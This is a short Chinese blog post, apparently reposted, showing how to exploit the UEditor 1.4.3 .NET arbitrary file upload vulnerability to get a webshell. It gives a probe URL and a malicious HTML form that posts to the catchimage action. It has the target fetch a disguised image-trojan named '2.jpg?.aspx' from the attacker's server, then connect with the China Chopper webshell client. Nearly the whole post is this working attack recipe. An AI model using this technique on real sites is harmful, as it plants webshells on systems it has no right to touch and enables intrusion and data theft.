UEditor 1.4.3 任意文件上传getshell


今天测试一个项目,进到后台之后发现使用富文本web编辑器

image

首先判断下是否有这个漏洞

访问如下链接 : http://xxxxxxxxx/ueditor/net/controller.ashx?action=catchimage
如出现

 

 则可尝试漏洞利用

构造一个恶意的html文件,action的url是我们攻击地址

<form action="http://xxxxxxxxx/controller.ashx?action=catchimage"enctype="application/x-www-form-urlencoded"  method="POST">   <p>shell addr:<input type="text" name="source[]" /></p >   <inputtype="submit" value="Submit" />

</form>

然后制作一个图片马,文件名改为2.jpg?.aspx上传至自己的服务器,通过构造的恶意html进行上传

image

 

可以看到页面返回状态和地址

 

 使用菜刀连接

http://xxxxxxxxx/ueditor/net/upload/image/xxxxxx   即可getshell

我的被安全设备拦截了

image

 


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM